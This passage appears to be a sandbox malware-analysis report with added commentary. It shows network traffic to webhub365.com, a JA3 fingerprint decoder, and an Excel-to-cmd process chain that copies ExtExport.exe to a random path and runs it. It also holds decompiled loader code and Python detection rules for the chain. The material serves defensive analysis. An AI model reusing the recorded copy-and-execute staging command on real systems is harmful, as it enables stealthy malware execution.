          Jun 11, 2021 00:01:02.933043003 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:01:02.994394064 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:01:02.994493008 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:01:04.609034061 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:01:04.707235098 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:01:04.792618036 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:01:04.792836905 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:02:19.796137094 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:02:19.796156883 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:02:19.796312094 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:02:19.796360016 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:03:02.591763020 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:03:02.591799974 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:03:02.649141073 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:03:02.649348021 CEST  49167     443       192.168.2.22    198.244.146.96

          UDP Packets

          Timestamp                             Src Port  Dst Port  Source IP     Dest IP
          Jun 11, 2021 00:01:02.692508936 CEST  52197     53        192.168.2.22  8.8.8.8
          Jun 11, 2021 00:01:02.758696079 CEST  53        52197     8.8.8.8       192.168.2.22
          Jun 11, 2021 00:01:03.308579922 CEST  53099     53        192.168.2.22  8.8.8.8
          Jun 11, 2021 00:01:03.360682964 CEST  53        53099     8.8.8.8       192.168.2.22
          Jun 11, 2021 00:01:03.372205019 CEST  52838     53        192.168.2.22  8.8.8.8
          Jun 11, 2021 00:01:03.423459053 CEST  53        52838     8.8.8.8       192.168.2.22
          Jun 11, 2021 00:01:04.013695955 CEST  61200     53        192.168.2.22  8.8.8.8
          Jun 11, 2021 00:01:04.068691969 CEST  53        61200     8.8.8.8       192.168.2.22
          Jun 11, 2021 00:01:04.076139927 CEST  49548     53        192.168.2.22  8.8.8.8
          Jun 11, 2021 00:01:04.139476061 CEST  53        49548     8.8.8.8       192.168.2.22

          DNS Queries

          Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name           Type            Class
          Jun 11, 2021 00:01:02.692508936 CEST  192.168.2.22  8.8.8.8  0x6029    Standard query (0)  webhub365.com  A (IP address)  IN (0x0001)

          DNS Answers

          Timestamp                             Source IP  Dest IP       Trans ID  Reply Code    Name           CName  Address         Type            Class
          Jun 11, 2021 00:01:02.758696079 CEST  8.8.8.8    192.168.2.22  0x6029    No error (0)  webhub365.com  -      198.244.146.96  A (IP address)  IN (0x0001)

          HTTPS Packets

          Timestamp: Jun 11, 2021 00:01:02.911695957 CEST
          Source IP:Port: 198.244.146.96:443
          Dest IP:Port: 192.168.2.22:49167
          Certificate chain presented by the server:
          • Subject: CN=webhub365.com; Issuer: CN=R3, O=Let's Encrypt, C=US; Not Before: Tue Jun 08 19:53:43 CEST 2021; Not After: Mon Sep 06 19:53:43 CEST 2021
          • Subject: CN=R3, O=Let's Encrypt, C=US; Issuer: CN=ISRG Root X1, O=Internet Security Research Group, C=US; Not Before: Fri Sep 04 02:00:00 CEST 2020; Not After: Mon Sep 15 18:00:00 CEST 2025
          • Subject: CN=ISRG Root X1, O=Internet Security Research Group, C=US; Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co.; Not Before: Wed Jan 20 20:14:03 CET 2021; Not After: Mon Sep 30 20:14:03 CEST 2024
          JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
          JA3 SSL Client Digest: 7dcce5b76c8b17472d024758970a406b
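          The HTTPS row gives the raw JA3 string and its digest without decoding either. The following is an added example, not part of the sandbox report: it splits the raw string into its five fields (TLS version, cipher suites, extensions, supported groups, point formats), maps the numbers to their IANA names (the lookup tables cover only the values that occur in this fingerprint) and recomputes the digest, which by definition is the MD5 of the raw string. matches_report() compares that recomputation with the digest column, so a transcription error in either field shows up as False.

```python
import hashlib
from typing import Dict, List

# Raw JA3 string and digest as listed in the HTTPS Packets table above.
REPORT_JA3 = ("771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-"
              "49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0")
REPORT_DIGEST = "7dcce5b76c8b17472d024758970a406b"

TLS_VERSIONS = {769: "TLS 1.0", 770: "TLS 1.1", 771: "TLS 1.2", 772: "TLS 1.3"}

# IANA cipher-suite names; only the values present in this fingerprint are listed.
CIPHER_SUITES = {
    49192: "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", 49191: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    49172: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA", 49171: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
    159: "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384", 158: "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256",
    57: "TLS_DHE_RSA_WITH_AES_256_CBC_SHA", 51: "TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
    157: "TLS_RSA_WITH_AES_256_GCM_SHA384", 156: "TLS_RSA_WITH_AES_128_GCM_SHA256",
    61: "TLS_RSA_WITH_AES_256_CBC_SHA256", 60: "TLS_RSA_WITH_AES_128_CBC_SHA256",
    53: "TLS_RSA_WITH_AES_256_CBC_SHA", 47: "TLS_RSA_WITH_AES_128_CBC_SHA",
    49196: "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384", 49195: "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
    49188: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384", 49187: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256",
    49162: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA", 49161: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
    106: "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256", 64: "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256",
    56: "TLS_DHE_DSS_WITH_AES_256_CBC_SHA", 50: "TLS_DHE_DSS_WITH_AES_128_CBC_SHA",
    10: "TLS_RSA_WITH_3DES_EDE_CBC_SHA", 19: "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA",
}
EXTENSIONS = {0: "server_name", 10: "supported_groups", 11: "ec_point_formats",
              13: "signature_algorithms", 23: "extended_master_secret",
              65281: "renegotiation_info"}
GROUPS = {23: "secp256r1", 24: "secp384r1", 25: "secp521r1", 29: "x25519"}
POINT_FORMATS = {0: "uncompressed"}


def _ints(fld: str) -> List[int]:
    """A JA3 field is dash-separated decimal numbers; an empty field means an empty list."""
    return [int(x) for x in fld.split("-")] if fld else []


def ja3_digest(raw: str) -> str:
    """The JA3 digest is the MD5 of the raw comma-separated string, nothing more."""
    return hashlib.md5(raw.encode("ascii")).hexdigest()


def decode_ja3(raw: str) -> Dict[str, object]:
    parts = raw.split(",")
    if len(parts) != 5:
        raise ValueError("JA3 string must have exactly 5 comma-separated fields")
    version, ciphers, exts, groups, fmts = parts
    return {
        "version": TLS_VERSIONS.get(int(version), f"unknown({version})"),
        "ciphers": [CIPHER_SUITES.get(c, f"unknown(0x{c:04x})") for c in _ints(ciphers)],
        "extensions": [EXTENSIONS.get(e, f"unknown({e})") for e in _ints(exts)],
        "groups": [GROUPS.get(g, f"unknown({g})") for g in _ints(groups)],
        "point_formats": [POINT_FORMATS.get(f, f"unknown({f})") for f in _ints(fmts)],
        "digest": ja3_digest(raw),
    }


def legacy_suites(decoded: Dict[str, object]) -> List[str]:
    """Suites a current client would not offer: 3DES, or static-RSA key exchange (no forward secrecy)."""
    return [c for c in decoded["ciphers"] if "3DES" in c or c.startswith("TLS_RSA_WITH_")]


def matches_report(raw: str = REPORT_JA3, digest: str = REPORT_DIGEST) -> bool:
    return ja3_digest(raw) == digest.lower()


if __name__ == "__main__":
    info = decode_ja3(REPORT_JA3)
    print(info["version"], "|", len(info["ciphers"]), "suites |", ", ".join(info["extensions"]))
    print("groups:", info["groups"], "point formats:", info["point_formats"])
    print("legacy suites offered:", len(legacy_suites(info)))
    print("digest recomputed:", info["digest"], "matches table:", matches_report())
```

          Decoded, the fingerprint is a TLS 1.2 hello with no TLS 1.3 suites, no x25519, and 3DES still offered: the profile of an older Windows client stack rather than a modern browser, which is what makes JA3 useful for telling the HTTP client embedded in a document chain apart from normal browsing on the same host.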

          Code Manipulations

          Statistics

          CPU Usage


          Memory Usage


          High Level Behavior Distribution


          Behavior


          System Behavior

          General

          Start time:00:00:38
          Start date:11/06/2021
          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Imagebase:0x13f660000
          File size:27641504 bytes
          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:00:00:43
          Start date:11/06/2021
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
          Imagebase:0x4a6e0000
          File size:345088 bytes
          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:00:00:45
          Start date:11/06/2021
          Path:C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
          Wow64 process (32bit):true
          Commandline:'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
          Imagebase:0x3a0000
          File size:25600 bytes
          MD5 hash:7F7F391491C315A4A72EFCAC0D34FA93
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 0%, Virustotal
          • Detection: 2%, Metadefender
          • Detection: 0%, ReversingLabs
          Reputation:low
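          The three process blocks above record the chain: EXCEL.EXE, then cmd.exe copying the Internet Explorer binary ExtExport.exe to C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, then the renamed copy running with its own directory as the first argument. As an added example (not from the report), the Python below runs three detections over Sysmon-style process-creation records constructed to mirror those blocks: an Office process spawning a command shell, a copy command that moves an executable out of Program Files into a freshly created path, and a process whose image hash belongs to a known system binary but whose file name does not. The hash table holds one entry, the MD5 7F7F391491C315A4A72EFCAC0D34FA93 the report gives for nnAzot.exe; because `copy` produces a byte-identical file, that is also the MD5 of ExtExport.exe on this Windows 7 image. The record layout, the parent-image fields and the benign explorer.exe record are assumptions made for the example.

```python
import ntpath
import re
from typing import Callable, Dict, List, Tuple

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "msaccess.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# MD5 -> expected file name. The single entry is the MD5 the report gives for nnAzot.exe;
# because `copy` produces a byte-identical file, it is also the MD5 of ExtExport.exe on
# this Windows 7 image. A real deployment fills this table from golden images (assumption).
KNOWN_SYSTEM_BINARIES = {"7f7f391491c315a4a72efcac0d34fa93": "extexport.exe"}

# `copy <source .exe> <destination>`; the source may be quoted and may contain spaces.
COPY_CMD = re.compile(r"\bcopy\s+[\"']?(.+?\.exe)[\"']?\s+[\"']?([^\"'\s]+)", re.IGNORECASE)

# Constructed Sysmon-style (Event ID 1) records modelled on the process list above. The
# explorer.exe record, the ParentImage values and the field layout are assumptions; the
# command lines and MD5 values are those shown in the report (double quotes restored).
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding',
     "Hashes": "MD5=5FB0A0F93382ECD19F5F499A5CAA59F0"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe',
     "Hashes": "MD5=5746BD7E255DD6A8AFA06F7C42C1BA41"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe",
     "CommandLine": r'"C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe" C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7',
     "Hashes": "MD5=7F7F391491C315A4A72EFCAC0D34FA93"},
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def md5_of(evt: dict) -> str:
    """Pull the MD5 out of a Sysmon 'Hashes' field such as 'MD5=...,SHA256=...'."""
    for part in evt.get("Hashes", "").split(","):
        if part.upper().startswith("MD5="):
            return part[4:].lower()
    return ""


def in_trusted_dir(path: str) -> bool:
    """True for paths under Program Files or Windows, after expanding the usual variables."""
    p = (path.lower()
         .replace("%programfiles(x86)%", r"c:\program files (x86)")
         .replace("%programfiles%", r"c:\program files")
         .replace("%systemroot%", r"c:\windows")
         .replace("%windir%", r"c:\windows"))
    return p.startswith((r"c:\program files", r"c:\windows"))


def rule_office_spawns_shell(evt: dict) -> bool:
    return basename(evt["ParentImage"]) in OFFICE_IMAGES and basename(evt["Image"]) in SHELL_IMAGES


def rule_copies_binary_out_of_trusted_dir(evt: dict) -> bool:
    m = COPY_CMD.search(evt["CommandLine"])
    if not m:
        return False
    src, dst = m.group(1), m.group(2)
    return in_trusted_dir(src) and not in_trusted_dir(dst)


def rule_renamed_system_binary(evt: dict, known: Dict[str, str] = KNOWN_SYSTEM_BINARIES) -> bool:
    expected = known.get(md5_of(evt))
    return expected is not None and basename(evt["Image"]) != expected


RULES: Dict[str, Callable[[dict], bool]] = {
    "office_spawns_shell": rule_office_spawns_shell,
    "binary_copied_out_of_trusted_dir": rule_copies_binary_out_of_trusted_dir,
    "renamed_system_binary": rule_renamed_system_binary,
}


def detect(events: List[dict]) -> List[Tuple[str, str]]:
    """(rule name, image basename) for every rule that fires on every event, in order."""
    return [(name, basename(evt["Image"]))
            for evt in events for name, rule in RULES.items() if rule(evt)]


if __name__ == "__main__":
    for rule_name, image in detect(EVENTS):
        print(f"{rule_name:<34} {image}")
```

          The hash rule is the one that survives renaming: the copy keeps the original file's bytes, so a table of hashes of the LOLBins shipped with your images catches it wherever it is dropped and whatever it is called, while the two command-line rules catch the staging step before the copy ever runs.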

          Disassembly

          Code Analysis


            Execution Graph

            Execution Coverage:8%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:6.2%
            Total number of Nodes:340
            Total number of Limit Nodes:6

            Graph


            Callgraph

            • Executed
            • Not Executed
            • Opacity -> Relevance
            • Disassembly available

            Executed Functions

            Control-flow Graph

            C-Code - Quality: 87%
            			E003A230E(void* __edx, void* __eflags, intOrPtr _a4) {
            				signed int _v8;
            				short _v528;
            				short _v1048;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				struct HINSTANCE__* _t17;
            				struct HINSTANCE__* _t19;
            				_Unknown_base(*)()* _t24;
            				CHAR* _t46;
            				void* _t49;
            				signed int _t50;
            				signed int _t52;
            
            				_t49 = __edx;
            				_v8 =  *0x3a6004 ^ _t52;
            				_t51 = _a4;
            				_push(L"mozcrt19.dll");
            				_t50 = 0x80004005;
            				E003A2225( &_v1048, 0x104, L"%s\\%s", _a4);
            				_push(L"mozsqlite3.dll");
            				E003A2225( &_v528, 0x104, L"%s\\%s", _a4);
            				_t46 = LoadLibraryExW;
            				_t17 = LoadLibraryExW( &_v1048, 0, 0); // executed
            				 *0x3a644c = _t17;
            				_t19 = LoadLibraryExW( &_v528, 0, 0x1100); // executed
            				 *0x3a6448 = _t19;
            				if(_t19 != 0) {
            					L2:
            					_t51 = GetProcAddress;
            					 *0x3a656c = GetProcAddress(_t19, "sqlite3_open");
            					 *0x3a6670 = GetProcAddress( *0x3a6448, "sqlite3_open_v2");
            					 *0x3a6570 = GetProcAddress( *0x3a6448, "sqlite3_open16");
            					 *0x3a6530 = GetProcAddress( *0x3a6448, "sqlite3_exec");
            					_t24 = GetProcAddress( *0x3a6448, "sqlite3_free");
            					_t46 = "sqlite3_close";
            					 *0x3a653c = _t24;
            					 *0x3a6494 = GetProcAddress( *0x3a6448, _t46);
            					 *0x3a6624 = GetProcAddress( *0x3a6448, "sqlite3_prepare_v2");
            					 *0x3a6628 = GetProcAddress( *0x3a6448, "sqlite3_prepare16_v2");
            					 *0x3a64ac = GetProcAddress( *0x3a6448, "sqlite3_column_count");
            					 *0x3a64c4 = GetProcAddress( *0x3a6448, "sqlite3_column_int");
            					 *0x3a64c8 = GetProcAddress( *0x3a6448, "sqlite3_column_int64");
            					 *0x3a64e4 = GetProcAddress( *0x3a6448, "sqlite3_column_text");
            					 *0x3a64e8 = GetProcAddress( *0x3a6448, "sqlite3_column_text16");
            					 *0x3a65cc = GetProcAddress( *0x3a6448, "sqlite3_step");
            					 *0x3a6588 = GetProcAddress( *0x3a6448, "sqlite3_reset");
            					 *0x3a6538 = GetProcAddress( *0x3a6448, "sqlite3_finalize");
            					 *0x3a6494 = GetProcAddress( *0x3a6448, _t46);
            					if( *0x3a6448 != 0) {
            						asm("sbb eax, eax");
            						_t50 = _t50 &  !( ~( *0x3a6570));
            					}
            					L4:
            					return E003A4AAD(_t50, _t46, _v8 ^ _t52, _t49, _t50, _t51);
            				}
            				_push(L"sqlite3.dll");
            				E003A2225( &_v528, 0x104, L"%s\\%s", _t51);
            				_t19 = LoadLibraryExW( &_v528, 0, 0x1100); // executed
            				 *0x3a6448 = _t19;
            				if(_t19 == 0) {
            					goto L4;
            				}
            				goto L2;
            			}


            APIs
              • Part of subcall function 003A2225: _vsnwprintf.MSVCRT ref: 003A2257
            • LoadLibraryExW.KERNELBASE(?,00000000,00000000), ref: 003A2377
            • LoadLibraryExW.KERNELBASE(?,00000000,00001100), ref: 003A238C
            • LoadLibraryExW.KERNELBASE(?,00000000,00001100), ref: 003A23C4
            • GetProcAddress.KERNEL32(00000000,sqlite3_open), ref: 003A23DF
            • GetProcAddress.KERNEL32(sqlite3_open_v2), ref: 003A23F1
            • GetProcAddress.KERNEL32(sqlite3_open16), ref: 003A2403
            • GetProcAddress.KERNEL32(sqlite3_exec), ref: 003A2415
            • GetProcAddress.KERNEL32(sqlite3_free), ref: 003A2427
            • GetProcAddress.KERNEL32(sqlite3_close), ref: 003A243A
            • GetProcAddress.KERNEL32(sqlite3_prepare_v2), ref: 003A244C
            • GetProcAddress.KERNEL32(sqlite3_prepare16_v2), ref: 003A245E
            • GetProcAddress.KERNEL32(sqlite3_column_count), ref: 003A2470
            • GetProcAddress.KERNEL32(sqlite3_column_int), ref: 003A2482
            • GetProcAddress.KERNEL32(sqlite3_column_int64), ref: 003A2494
            • GetProcAddress.KERNEL32(sqlite3_column_text), ref: 003A24A6
            • GetProcAddress.KERNEL32(sqlite3_column_text16), ref: 003A24B8
            • GetProcAddress.KERNEL32(sqlite3_step), ref: 003A24CA
            • GetProcAddress.KERNEL32(sqlite3_reset), ref: 003A24DC
            • GetProcAddress.KERNEL32(sqlite3_finalize), ref: 003A24EE
            • GetProcAddress.KERNEL32(sqlite3_close), ref: 003A24FC
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: AddressProc$LibraryLoad$_vsnwprintf
            • String ID: %s\%s$mozcrt19.dll$mozsqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_count$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_free$sqlite3_open$sqlite3_open16$sqlite3_open_v2$sqlite3_prepare16_v2$sqlite3_prepare_v2$sqlite3_reset$sqlite3_step
            • API String ID: 2176504369-1379368381
            • Opcode ID: 4adf3703445954c9f6a47620c6ed6ee8caaf31918b66e400061f797be035a971
            • Instruction ID: c07cf6f172aa48d57a5590980aed75f65b613399ee5d08c5c5a73691fd13daf1
            • Opcode Fuzzy Hash: 4adf3703445954c9f6a47620c6ed6ee8caaf31918b66e400061f797be035a971
            • Instruction Fuzzy Hash: 34511DB5E40318AFCB239F72AC4BE863FACE71B790F080426F514932A1D6759490CF61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            C-Code - Quality: 100%
            			E003A4BBA() {
            
            				SetUnhandledExceptionFilter(E003A4B72); // executed
            				return 0;
            			}



            APIs
            • SetUnhandledExceptionFilter.KERNEL32 ref: 003A4BBF
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 5d39a938392c59ac4060243a1ef08ff2bdca4372fa343a205520d55e9a070ec7
            • Instruction ID: 715fc98708ad759f542535201374ad956433efb4360264c25c5b753d9ae8ee5a
            • Opcode Fuzzy Hash: 5d39a938392c59ac4060243a1ef08ff2bdca4372fa343a205520d55e9a070ec7
            • Instruction Fuzzy Hash: 359002A02D61004646065B715E4968527989A9B746B414494B281C4554DB9480045521
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            C-Code - Quality: 50%
            			E003A490B() {
            				int _t11;
            				intOrPtr _t14;
            				intOrPtr _t19;
            				void* _t20;
            				intOrPtr* _t23;
            				void* _t34;
            				intOrPtr _t35;
            				void* _t36;
            				intOrPtr _t37;
            				intOrPtr _t39;
            				void* _t41;
            				void* _t54;
            
            				_push(0xc);
            				_push(0x3a5100);
            				E003A4EC4(_t20, _t34, _t36);
            				 *((intOrPtr*)(_t41 - 4)) = 0;
            				_t37 =  *((intOrPtr*)( *[fs:0x18] + 4));
            				_t35 = 0;
            				while(1) {
            					asm("lock cmpxchg [edx], ecx");
            					if(0 == 0) {
            						break;
            					}
            					if(0 != _t37) {
            						Sleep(0x3e8);
            						continue;
            					} else {
            						_t39 = 1;
            						_t35 = 1;
            					}
            					L6:
            					if( *0x3a66b0 != _t39) {
            						__eflags =  *0x3a66b0;
            						if(__eflags != 0) {
            							 *0x3a6044 = _t39;
            							goto L12;
            						} else {
            							 *0x3a66b0 = _t39;
            							_t19 = E003A4A75(0x3a1014, 0x3a1020); // executed
            							__eflags = _t19;
            							if(__eflags == 0) {
            								goto L12;
            							} else {
            								 *((intOrPtr*)(_t41 - 4)) = 0xfffffffe;
            								_t11 = 0xff;
            								goto L24;
            							}
            						}
            					} else {
            						_push(0x1f);
            						L003A4C84();
            						L12:
            						if( *0x3a66b0 == _t39) {
            							_push(0x3a1010);
            							_push(0x3a1004);
            							L003A4EB8();
            							 *0x3a66b0 = 2;
            						}
            						if(_t35 == 0) {
            							 *0x3a66ac = 0;
            						}
            						_t51 =  *0x3a66bc;
            						if( *0x3a66bc != 0 && E003A4CF0(_t51, 0x3a66bc) != 0) {
            							 *0x3a66bc(0, 2, 0);
            						}
            						_push( *0x3a6050);
            						_t11 = E003A31C6(_t54,  *0x3a6048,  *0x3a604c); // executed
            						 *0x3a6040 = _t11;
            						if( *0x3a6058 != 0) {
            							__eflags =  *0x3a6044;
            							if( *0x3a6044 == 0) {
            								__imp___cexit();
            								_t11 =  *0x3a6040;
            							}
            							 *((intOrPtr*)(_t41 - 4)) = 0xfffffffe;
            							L24:
            							return E003A4F09(_t11);
            						} else {
            							exit(_t11); // executed
            							_t23 =  *((intOrPtr*)(_t41 - 0x14));
            							_t14 =  *((intOrPtr*)( *_t23));
            							 *((intOrPtr*)(_t41 - 0x1c)) = _t14;
            							_push(_t23);
            							_push(_t14);
            							L003A4BCE();
            							return _t14;
            						}
            					}
            				}
            				_t39 = 1;
            				__eflags = 1;
            				goto L6;
            			}


            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: CurrentFilterImageNonwritableSleepXcpt__initterm_e_amsg_exit_inittermexit
            • String ID:
            • API String ID: 3102234582-0
            • Opcode ID: fa259fa69ad429ab4459a30e1250dbdcb51d7c103ca10c39790072549a628acd
            • Instruction ID: 7c9657a06dfb9a04b997d47707ef52dd45d5aa9b8a313b7bf55cca110b1d454f
            • Opcode Fuzzy Hash: fa259fa69ad429ab4459a30e1250dbdcb51d7c103ca10c39790072549a628acd
            • Instruction Fuzzy Hash: 9D319E71688351DFDB23DF64AC4A72B77A8F787720F25412DE5129A2E1DBB48890CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            APIs
              • Part of subcall function 003A47E2: GetVersionExA.KERNEL32(003A63A8,003A31E5), ref: 003A47FA
            • rand_s.MSVCRT ref: 003A320E
            • VirtualAlloc.KERNELBASE(00000000,00010000,00002000,00000001), ref: 003A323A
            • SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 003A326A
            • SHAnsiToUnicode.SHLWAPI(00000004,?,00000104), ref: 003A327B
            • SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 003A328C
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: AnsiUnicode$AllocVersionVirtualrand_s
            • String ID:
            • API String ID: 2672016816-0
            • Opcode ID: 4373fa936fda230a67604c6574d97528886220195a72b1d7b5e3182ac7eb8733
            • Instruction ID: fd85ff5acac45c12e7320db1a4545ac7f8013c7e03f959babf410be459c13c2a
            • Opcode Fuzzy Hash: 4373fa936fda230a67604c6574d97528886220195a72b1d7b5e3182ac7eb8733
            • Instruction Fuzzy Hash: AD31A071A002089AEF32DB65DC45BBA73ADEB87750F1545A9F505D6090EB31EE81CB20
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Control-flow Graph

            • Executed
            • Not Executed
            C-Code - Quality: 100%
            			E003A4DF8() {
            				void* _v8;
            				struct _FILETIME _v16;
            				signed int _v20;
            				union _LARGE_INTEGER _v24;
            				signed int _t23;
            				signed int _t35;
            				signed int _t36;
            				signed int _t39;
            
            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
            				_t23 =  *0x3a6004;
            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
            					GetSystemTimeAsFileTime( &_v16);
            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
            					_v8 = _v8 ^ GetCurrentProcessId();
            					_v8 = _v8 ^ GetCurrentThreadId();
            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
            					QueryPerformanceCounter( &_v24);
            					_t35 = _v20 ^ _v24.LowPart;
            					_t39 = _v8 ^ _t35;
            					if(_t39 == 0xbb40e64e || ( *0x3a6004 & 0xffff0000) == 0) {
            						_t39 = 0xbb40e64f;
            					}
            					 *0x3a6004 = _t39;
            					 *0x3a6008 =  !_t39;
            					return _t35;
            				} else {
            					_t36 =  !_t23;
            					 *0x3a6008 = _t36;
            					return _t36;
            				}
            			}


            APIs
            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003A4E2E
            • GetCurrentProcessId.KERNEL32 ref: 003A4E3D
            • GetCurrentThreadId.KERNEL32 ref: 003A4E46
            • GetTickCount.KERNEL32 ref: 003A4E4F
            • QueryPerformanceCounter.KERNEL32(?), ref: 003A4E64
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
